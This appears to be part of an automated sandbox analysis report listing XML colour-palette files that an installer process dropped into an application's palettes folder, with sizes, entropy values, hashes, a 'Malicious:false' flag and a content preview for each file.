                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):10409
                                                                  Entropy (8bit):4.404098133451595
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8+KKVG0v/+Hpf+19h0L3TKKVG0v/+Hpf+19h0L3TKKVG0v/+Hpf+19h0L3TKKJ:c83iiiiiiiiiiiiii3
                                                                  MD5:F0FA14A067634EAB20068E39683FE4B9
                                                                  SHA1:B371614418D57E2E0BDCEAAA65E31868EE2CBB4A
                                                                  SHA-256:05133D0E4128B2A15DAF6A1C98A71D1578934C02B1ADE5AEC1C24318486EC600
                                                                  SHA-512:AFDEF18AC9BD9B6760A23C96062F77B7C14EC67C34513A3DBED77A86FC730B8C1360991A3EAF90A41FC43F922C466A45387992419EFA27D0C1936EFD43378496
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Ega" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#a800a8" alpha="255" />. <Color colorName="#fc5454" alpha="255" />. <Color colorName="#fc54a8" alpha="255" />. <Color colorName="#fc54fc" alpha="255" />. <Color colorName="#fca8fc" alpha="255" />. <Color colorName="#fcfc00" alpha="255" />. <Color colorName="#fcfca8" alpha="255" />. <Color colorName="#fcfcfc" alpha="255" />. <Color colorName="#a8fcfc" alpha="255" />. <Color colorName="#00fcfc" alpha="255" />. <Color colorName="#54a8fc" alpha="255" />. <Color colorName="#0000fc" alpha="255" />. <Color colorName="#0054a8" alpha="255" />. <Color colorName="#000054" alpha="255" />. <Color colorName="#545454" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#a800a8" alpha="255" />. <Color colorName="#fc5454" alpha="255" />. <Color colorName="#fc54a8" alpha="255" />. <Color colorName="#fc54fc" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-A30HD.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11100
                                                                  Entropy (8bit):4.529756828731143
                                                                  Encrypted:false
                                                                  SSDEEP:96:9DKeijz3LRWCfy9eXS29C/v6bSiZdPsbZun:9DKeOLwsThC/vijPgZun
                                                                  MD5:965513CD3FAECC248B9BD74826973763
                                                                  SHA1:00EB93C95A11ED6F454AB4FA7E1A91710C85BD49
                                                                  SHA-256:EFC578E3ACD95A1A02B4256EFAE6B667B57F89FFA8802CBD0FC76158BCFE3C3B
                                                                  SHA-512:7417ECDF4FD22E6A8C2C19D370CE3BDCAC16340CF39B19274F778D684BA32CC4172F737BDD14DF8991C50AB20E9BD94FB1C15A406673BD2440D65C5BA2BF2C68
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cranes" >. <Color colorName="#080808" alpha="255" />. <Color colorName="#c0b090" alpha="255" />. <Color colorName="#c0a480" alpha="255" />. <Color colorName="#504844" alpha="255" />. <Color colorName="#708c58" alpha="255" />. <Color colorName="#688460" alpha="255" />. <Color colorName="#5c6854" alpha="255" />. <Color colorName="#18080c" alpha="255" />. <Color colorName="#606c5c" alpha="255" />. <Color colorName="#80684c" alpha="255" />. <Color colorName="#2c1c18" alpha="255" />. <Color colorName="#9c8c74" alpha="255" />. <Color colorName="#9c9474" alpha="255" />. <Color colorName="#44443c" alpha="255" />. <Color colorName="#d4c494" alpha="255" />. <Color colorName="#90886c" alpha="255" />. <Color colorName="#a09480" alpha="255" />. <Color colorName="#d8dcd8" alpha="255" />. <Color colorName="#2c1c28" alpha="255" />. <Color colorName="#440c10" alpha="255" />. <Color colorName="#0c0820" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-AAOC4.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11099
                                                                  Entropy (8bit):4.521546649991855
                                                                  Encrypted:false
                                                                  SSDEEP:48:c86999BBhkHr68lQ77I68dXX0VVVIubWdr96IBIBWLZvRvmPV+kQ1xdrpR:9tHr68lI8dXX0VVV/bWdr9Q+kQ1xd9R
                                                                  MD5:0355D5D6840EBE4B10C35302116F0775
                                                                  SHA1:6B16C065A7AAA7817C177A6D0559CDE4EE42563B
                                                                  SHA-256:519E38D7A61151E89EA53CF7B9C807DBB79CFAE68E90EA0182E176F2242593CB
                                                                  SHA-512:4702666B1648B089B0EC809A7A4503A1BFC4B8345C3C0D8DA561549C05664719F7FDD57B09AC2363C1BA0BCB14DA798D39E68885BB191264B09EE4EA254C909C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Bgold" >. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd814" alpha="255" />. <Color colorName="#ecd414" alpha="255" />. <Color colorName="#ecd414" alpha="255" />. <Color colorName="#ecd018" alpha="255" />. <Color colorName="#ecd018" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8cc18" alpha="255" />. <Color colorName="#e8c818" alpha="255" />. <Color colorName="#e8c818" alpha="255" />. <Color colorName="#e8c418" alpha="255" />. <Color colorName="#e8c418" alpha="255" />. <Color colorName="#e4c018" alpha="255" />. <Color colorName="#e4c01c" alpha="255" />. <Color colorName="#e4bc1c" alpha="255" />. <Color colorName="#e4bc1c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName="#e4b81c" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-BGTCO.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):7844
                                                                  Entropy (8bit):4.635293636307541
                                                                  Encrypted:false
                                                                  SSDEEP:48:c86EXoQn/Yd/TQ6zXB6F29/TfdvgK6Dw4yECGwk:962r/YVEkh3awCZl
                                                                  MD5:9E2FD870F0AA02E4F83CE0CD84A6D1B1
                                                                  SHA1:0F6EA68107C4FCD6E071F78CDF4074DAC126FBE2
                                                                  SHA-256:364FEF379510A503BA894521456CAEDACA07E6897997DC647F6BEC34736C7C3B
                                                                  SHA-512:08BC5B7CA976B2E2D7C9194CADB51E303E3627FF6F6055958E1D5ABF888D679FA279343A388792FD0C24E5E1CF87D01E896542CE665C7B0F3567771B492BA38A
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Default Palette" >. Row 0 -->. <Color colorName="#ea0003" alpha="255" />. <Color colorName="#cc1294" alpha="255" />. <Color colorName="#990099" alpha="255" />. <Color colorName="#2408dd" alpha="255" />. <Color colorName="#0067ce" alpha="255" />. <Color colorName="#003663" alpha="255" />. <Color colorName="#005b7b" alpha="255" />. <Color colorName="#005952" alpha="255" />. <Color colorName="#005826" alpha="255" />. <Color colorName="#005e20" alpha="255" />. <Color colorName="#406618" alpha="255" />. <Color colorName="#827b00" alpha="255" />. <Color colorName="#7d4900" alpha="255" />. <Color colorName="#7b2e00" alpha="255" />. <Color colorName="#790000" alpha="255" />. <Color colorName="#7a0026" alpha="255" />. Row 1 -->. <Color colorName="#ff171a" alpha="255" />. <Color colorName="#e814a9" alpha="255" />. <Color colorName="#930d93" alpha="255" />. <Color colorName="#361cff" alpha="255" />. <Color colorName=
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-C0KBM.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):3445
                                                                  Entropy (8bit):4.585233717349798
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d82UASDj24TnsEq+nVtzsOtHe0CqtrKcnM3WqNuKFc4FIPcHlryZeCKxqoZAP0h:c8r3eu6ZLgmbo2P
                                                                  MD5:62FF50650F4445EFED8372C38FDB1A3D
                                                                  SHA1:BEC662C8C5D5CE9C8EE3040F7960443E74EC3F86
                                                                  SHA-256:8DA14B7FAA69DAEBE69EADFAD448CCE10E9FAAB5217059CDA4EE1E81345F78FB
                                                                  SHA-512:C64A3956631E67171A71EA96E2EA001C4137814EE7019C5AE6BB589E7241351E8D50480DBD987071DC9A956A3DBEEE9141F6991AC7E867A4126EE2CD9772DF5E
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Muted" >. <Color colorName="#8b8989" alpha="255" />. <Color colorName="#8b8682" alpha="255" />. <Color colorName="#8b8378" alpha="255" />. <Color colorName="#8b7d6b" alpha="255" />. <Color colorName="#8b7765" alpha="255" />. <Color colorName="#8b795e" alpha="255" />. <Color colorName="#8b8970" alpha="255" />. <Color colorName="#8b8878" alpha="255" />. <Color colorName="#8b8b83" alpha="255" />. <Color colorName="#838b83" alpha="255" />. <Color colorName="#8b8386" alpha="255" />. <Color colorName="#8b7d7b" alpha="255" />. <Color colorName="#838b8b" alpha="255" />. <Color colorName="#473c8b" alpha="255" />. <Color colorName="#27408b" alpha="255" />. <Color colorName="#00008b" alpha="255" />. <Color colorName="#104e8b" alpha="255" />. <Color colorName="#36648b" alpha="255" />. <Color colorName="#00688b" alpha="255" />. <Color colorName="#4a708b" alpha="255" />. <Color colorName="#607b8b" alpha="255" />. <Color colorName
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-CNFE2.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.517294231791309
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8bKovLmpFtVe/+++Hmmfss6WWsAD333+qGG86:9bKkLyn3ss6WWsAD333M6
                                                                  MD5:8F4FD0FB6EBA0E036B26DFBCA377F0B1
                                                                  SHA1:2D834A27497795BF3474CB699782360720EA3025
                                                                  SHA-256:3604874BADAD549B7680006F4ACF15C0DD1B96939D0233538FA849C794172606
                                                                  SHA-512:B93B7611273B68E7ACB53EC2ACF331197BAB7DAF9028B9133082EB1ADDB4A02FBFF5E634B4CEAC61F15E290991C2486C2B36EB87AD1CFC40087F90090A7A5703
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Cascade" >. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#6c5880" alpha="255" />. <Color colorName="#685c84" alpha="255" />. <Color colorName="#685c84" alpha="255" />. <Color colorName="#645c84" alpha="255" />. <Color colorName="#605c84" alpha="255" />. <Color colorName="#606088" alpha="255" />. <Color colorName="#5c6088" alpha="255" />. <Color colorName="#5c6088" alpha="255" />. <Color colorName="#586088" alpha="255" />. <Color colorName="#54648c" alpha="255" />. <Color colorName="#54648c" alpha="255" />. <Color colorName="#50648c" alpha="255" />. <Color colorName="#4c6088" alpha="255" />. <Color colorName="#50648c" alpha="255" />. <Color colorName="#546890" alpha="255" />. <Color colorName="#586894" alpha="255" />. <Color colorName="#5c6c94" alpha="255" />. <Color colorName="#607098" alpha="255" />. <Color colorName="#64709c" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-DDI13.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):868
                                                                  Entropy (8bit):4.709999557100073
                                                                  Encrypted:false
                                                                  SSDEEP:12:TMHd84eIgeIge5QQPgezgeNge4QgeCageHhgexgeNiRphge5QQPgezgeNge4QgeP:2d84KKTrRjtd/1Vgq0TrRjtd/1Vgqq
                                                                  MD5:4D3A4FB8B3B34337F6661AFFBDBEEE94
                                                                  SHA1:ACB41D6DCE2C15CF71897E2ACDA69E8B7714FB3B
                                                                  SHA-256:74CD69E3DFDE536C35E84DC66CED40025F683061FCCC48914CEBC60F0859E9ED
                                                                  SHA-512:3527548504695E469ED25884EB23699E9F5C4FB70583137CBB9065C7455239C1CAFC616C84FBA46DC39FA343DB6D3B7B84F9734081289218366BD30C9D5F5216
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Paintjet" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#18140c" alpha="255" />. <Color colorName="#f4f0e8" alpha="255" />. <Color colorName="#c44448" alpha="255" />. <Color colorName="#30845c" alpha="255" />. <Color colorName="#f0e848" alpha="255" />. <Color colorName="#343074" alpha="255" />. <Color colorName="#bc306c" alpha="255" />. <Color colorName="#2874c4" alpha="255" />. <Color colorName="#18140c" alpha="255" />. <Color colorName="#f4f0e8" alpha="255" />. <Color colorName="#c44448" alpha="255" />. <Color colorName="#30845c" alpha="255" />. <Color colorName="#f0e848" alpha="255" />. <Color colorName="#343074" alpha="255" />. <Color colorName="#bc306c" alpha="255" />. <Color colorName="#2874c4" alpha="255" />.</Palette>.
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-DTPC9.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.444903693252684
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8yqN8JZ9BBJKEA2NPFY+VhqXHsNUHkHh6llDt6PF84:9yzBJPhNPFY+LuHsikH0lL6PF84
                                                                  MD5:06AD34D97673F018B4A397407D163B34
                                                                  SHA1:F1B2339D19C9C0D151E682730949CDE90B43BDED
                                                                  SHA-256:C4EB60418A9A1976272CBFA8BDA1905EFC16C57B70222243B61515B43F9784FC
                                                                  SHA-512:44AE89194C9AB3341F22A94459571D888B99178D0EFE2286CBFEDE7200A866A9487797DBB1F9AC561C459FD1BCCDF00D14488C7F279FFE30E4313E3902CD6F0D
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Volcano" >. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000008" alpha="255" />. <Color colorName="#000010" alpha="255" />. <Color colorName="#000018" alpha="255" />. <Color colorName="#000020" alpha="255" />. <Color colorName="#000028" alpha="255" />. <Color colorName="#000030" alpha="255" />. <Color colorName="#000038" alpha="255" />. <Color colorName="#000040" alpha="255" />. <Color colorName="#000048" alpha="255" />. <Color colorName="#000054" alpha="255" />. <Color colorName="#00005c" alpha="255" />. <Color colorName="#000064" alpha="255" />. <Color colorName="#00006c" alpha="255" />. <Color colorName="#000074" alpha="255" />. <Color colorName="#00007c" alpha="255" />. <Color colorName="#000084" alpha="255" />. <Color colorName="#00008c" alpha="255" />. <Color colorName="#000094" alpha="255" />. <Color colorName="#00009c" alpha="255" />. <Color colorNa
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-EF3RT.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11106
                                                                  Entropy (8bit):4.520954509267113
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8tJXTREE1xQSN+3aX5TNZsU2bRERvvQVPttl+lIofeWfgqzmGfHRII:9XTPcKJNZWbRE2+lIoGWgqzBv
                                                                  MD5:7DD9866633CE45F76060C588E030465B
                                                                  SHA1:93976533A4B005FC12A96113738EF75A15761DB9
                                                                  SHA-256:FC9E858A9B4DC26C25C345C91AF753F0B60998F5041EFE4A1FEC63979A5B8AF9
                                                                  SHA-512:04285509F540E047DC21D89E95D4608385C80BF3C207A4CE3AE3E17AC5AEB7DE7EDA6D4E679C16F0F44C810539A8BF6962DE1E89DB20DB10056554DC123A3DB6
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Dark pastels" >. <Color colorName="#3868b8" alpha="255" />. <Color colorName="#3468b4" alpha="255" />. <Color colorName="#3468b4" alpha="255" />. <Color colorName="#3468b0" alpha="255" />. <Color colorName="#3468b0" alpha="255" />. <Color colorName="#3068ac" alpha="255" />. <Color colorName="#3068ac" alpha="255" />. <Color colorName="#3064a8" alpha="255" />. <Color colorName="#3064a8" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a4" alpha="255" />. <Color colorName="#2c64a0" alpha="255" />. <Color colorName="#2c64a0" alpha="255" />. <Color colorName="#28649c" alpha="255" />. <Color colorName="#28649c" alpha="255" />. <Color colorName="#286098" alpha="255" />. <Color colorName="#286098" alpha="255" />. <Color colorName="#246094" alpha="255" />. <Color colorName="#246094" alpha="255" />. <Color colorName="#246090" alpha="255" />. <Color co
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-ETHPC.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):9377
                                                                  Entropy (8bit):4.493251477050456
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8hEyqQe37qQyVqSa1qyy3tqaCtqaskyqw+3bqwSVqSa1qyy3/qU8vnqUmVqSam:c8tb1Io2Co2tkCwcCwi+cI+cpFpe+4xs
                                                                  MD5:E35F1C80A2CAE673B1841E64ECCC04A8
                                                                  SHA1:047D14A9C6DC6C6B7D81CC38B8F5693DF7F5AFB2
                                                                  SHA-256:6A1FC50707D75A35E1728D78A270CF345B0E36A0206FC147401574B80892C507
                                                                  SHA-512:777E4C700138E18DAD2AA90CEDAA00DCCE279A6F552D2215A7FE765474BB5C20EC3AE7D0BA5A04CC7F5AFF6361C80E743C10433F80564B4AD281E6ECA3D456D0
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Web" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#ffffcc" alpha="255" />. <Color colorName="#ffff99" alpha="255" />. <Color colorName="#ffff66" alpha="255" />. <Color colorName="#ffff33" alpha="255" />. <Color colorName="#ffff00" alpha="255" />. <Color colorName="#ffccff" alpha="255" />. <Color colorName="#ffcccc" alpha="255" />. <Color colorName="#ffcc99" alpha="255" />. <Color colorName="#ffcc66" alpha="255" />. <Color colorName="#ffcc33" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff99ff" alpha="255" />. <Color colorName="#ff99cc" alpha="255" />. <Color colorName="#ff9999" alpha="255" />. <Color colorName="#ff9966" alpha="255" />. <Color colorName="#ff9933" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff66ff" alpha="255" />. <Color colorName="#ff66cc" alpha="255" />. <Color colorName="#ff6699" alpha="255" />. <Color colorName="
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-GKENC.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11102
                                                                  Entropy (8bit):4.510794721838206
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8EzBsigWoNmmc3hIggg2YSrSrSrSqttNWS4444c3x11oSSSyyyOOslGmmmbBBw:92BgWoAMeeeqttwx118mmmE
                                                                  MD5:C91880ADED9B78732A397979BEC65E2D
                                                                  SHA1:A01B99311DD1E6A47E204B85239DB5B75FE0CED9
                                                                  SHA-256:B4192C468E0F217FAF1553E7B4F66746B8443AADEFE187A11F4363144FF368CF
                                                                  SHA-512:DA92F840ABCFB60A719AF9BC804CE1BF26EF638FE4A7A835546821324FD48911FEEBAE478F4719104079BD38E399AA7C114CD4C4897BA9BC0254D24C462B31C6
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Grayblue" >. <Color colorName="#7ca480" alpha="255" />. <Color colorName="#7ca480" alpha="255" />. <Color colorName="#7ca47c" alpha="255" />. <Color colorName="#7ca07c" alpha="255" />. <Color colorName="#7ca07c" alpha="255" />. <Color colorName="#78a07c" alpha="255" />. <Color colorName="#78a07c" alpha="255" />. <Color colorName="#789c7c" alpha="255" />. <Color colorName="#789c7c" alpha="255" />. <Color colorName="#789c78" alpha="255" />. <Color colorName="#749c78" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#749878" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709474" alpha="255" />. <Color colorName="#709074" alpha="255" />. <Color colorName="#6c9074" alpha="255" />. <Color colorN
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-HO5OC.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):8830
                                                                  Entropy (8bit):4.5671771986729945
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8nlkH8SAt0mSYbVITiknTXtr167Ez2evNmPSA:9s0IGY5E
                                                                  MD5:957B5BE12E4CCCFF184C6071C61C36AF
                                                                  SHA1:11D10A14126BE7470E18F378B5B69817C479899A
                                                                  SHA-256:D5C5690730CA88EB9B4A072A5F08BFA3F91417637B6ADF0F29F7EF2BE5CE0335
                                                                  SHA-512:2A0EF16FF5D3B03696977148BAC7297C33ADDF9F76776E30B8BC1E43C4A6CE7C9B5D2F6945EA10387786C211E27EE6CE72499F5D53FD2CF1651D88891AC94AD2
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Variette">. <Color colorName="#791179" alpha="255"/>. <Color colorName="#2e0c50" alpha="255"/>. <Color colorName="#1c061c" alpha="255"/>. <Color colorName="#060632" alpha="255"/>. <Color colorName="#0c2e50" alpha="255"/>. <Color colorName="#061c1c" alpha="255"/>. <Color colorName="#117979" alpha="255"/>. <Color colorName="#0c502e" alpha="255"/>. <Color colorName="#063206" alpha="255"/>. <Color colorName="#2e500c" alpha="255"/>. <Color colorName="#797911" alpha="255"/>. <Color colorName="#502e0c" alpha="255"/>. <Color colorName="#320606" alpha="255"/>. <Color colorName="#500c2e" alpha="255"/>. <Color colorName="#100b07" alpha="255"/>. <Color colorName="#020202" alpha="255"/>. <Color colorName="#b01ab0" alpha="255"/>. <Color colorName="#52158f" alpha="255"/>. <Color colorName="#401040" alpha="255"/>. <Color colorName="#101071" alpha="255"/>. <Color colorName="#15528f" alpha="255"/>. <Color colorName="#104040" alpha="2
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-IBV9U.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):1167
                                                                  Entropy (8bit):4.563970618798404
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8q9eNjqvjFw4qEYqNqmIEorFw9EHMJ+C5qUyqz9Eyc:c8qrW1
                                                                  MD5:408E80BCEE5CA28CF0975443D5C64FB3
                                                                  SHA1:63B98D8F1C05AA61E32C82F9918D9F878F620868
                                                                  SHA-256:4ABDC44792D22B4AD4127D0223CF4251B6CC3A7DB375E7C654DB6C1DBF6508A5
                                                                  SHA-512:83D3EB545C408F52B1C53CC164B0F73705D1E51166C2E17D6BEEEBA2216F5063390C0D40A36646327C6FFFB39A578F42A62D2E090A94931FED6C0760DF3926D1
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Lights" >. <Color colorName="#fffafa" alpha="255" />. <Color colorName="#f8f8ff" alpha="255" />. <Color colorName="#f5f5f5" alpha="255" />. <Color colorName="#dcdcdc" alpha="255" />. <Color colorName="#fffaf0" alpha="255" />. <Color colorName="#fdf5e6" alpha="255" />. <Color colorName="#faf0e6" alpha="255" />. <Color colorName="#faebd7" alpha="255" />. <Color colorName="#ffefd5" alpha="255" />. <Color colorName="#ffebcd" alpha="255" />. <Color colorName="#ffe4c4" alpha="255" />. <Color colorName="#ffdab9" alpha="255" />. <Color colorName="#ffdead" alpha="255" />. <Color colorName="#ffe4b5" alpha="255" />. <Color colorName="#fff8dc" alpha="255" />. <Color colorName="#fffff0" alpha="255" />. <Color colorName="#fffacd" alpha="255" />. <Color colorName="#fff5ee" alpha="255" />. <Color colorName="#f0fff0" alpha="255" />. <Color colorName="#f5fffa" alpha="255" />. <Color colorName="#f0ffff" alpha="255" />. <Color colorNam
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-IJPU2.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11104
                                                                  Entropy (8bit):4.490036673630926
                                                                  Encrypted:false
                                                                  SSDEEP:24:2d8qEyqE87qkKy3sSy3Kk7q8EEyq61KKKKOy1qtqwWKKKKGmty2y83Wy8SoGg1IE:c8H+29i4EDukGyO2c6n+ACYA57IYjAXr
                                                                  MD5:929BC840F457F02152D76C36B8B3F76C
                                                                  SHA1:8E99E3468F795AB7DB375D4765163C8A2DFCA471
                                                                  SHA-256:5F58F06C3E8039E96B8C7E8501DF216A662F1C3676D7070EAF30EE3950F16C2D
                                                                  SHA-512:8CC63902403697DDF04D3A9BB5F5E6DADFEDA8FFB818710F47F191904B95D240F60633D4954F71941266DD59F3135060A836C6E46B9DBE6C6A92CB79DBF85552
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: <?xml version="1.0" encoding="UTF-8"?>.<Palette editable="false" name="Visibone 2" >. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#ffcc00" alpha="255" />. <Color colorName="#ff9900" alpha="255" />. <Color colorName="#ff6600" alpha="255" />. <Color colorName="#ff3300" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#333333" alpha="255" />. <Color colorName="#666666" alpha="255" />. <Color colorName="#999999" alpha="255" />. <Color colorName="#cccccc" alpha="255" />. <Color colorName="#ffffff" alpha="255" />. <Color colorName="#99cc00" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colorName="#000000" alpha="255" />. <Color colo
                                                                  C:\Users\user\AppData\Roaming\SQLite Distributed tools\palettes\is-K9AJS.tmp
                                                                  Process:C:\Users\user\AppData\Local\Temp\is-VUEFB.tmp\libupdate.tmp
                                                                  File Type:XML 1.0 document, ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):11101
                                                                  Entropy (8bit):4.516595588414972
                                                                  Encrypted:false
                                                                  SSDEEP:48:c8DYdnffnqF/m8vNA8OpuOojY7Ji6bdblCoqg86LCP5+4:98vqFJwujjY7JiublCw86i+4
                                                                  MD5:0CE40760E381E5049A723E79F88669D0
                                                                  SHA1:033B51FF18D470E7BF244CC89F0FF03E7CEF238C
                                                                  SHA-256:7FCBFEB0E28EAF8B1D0A506CEB729B6725AA2ABA551B797C0380BBCFE10A4AC4
                                                                  SHA-512:9D8C31FC5AB58F7714BB8D6A3A59B5F52B8AA9C35B96925191B5C479B565028C480DEC5C737FC25C782E168E9CDD0E4F60053F634D0BED2336ABA8E133F0AF38
                                                                  Malicious:false
                                                                  Reputation:unknown
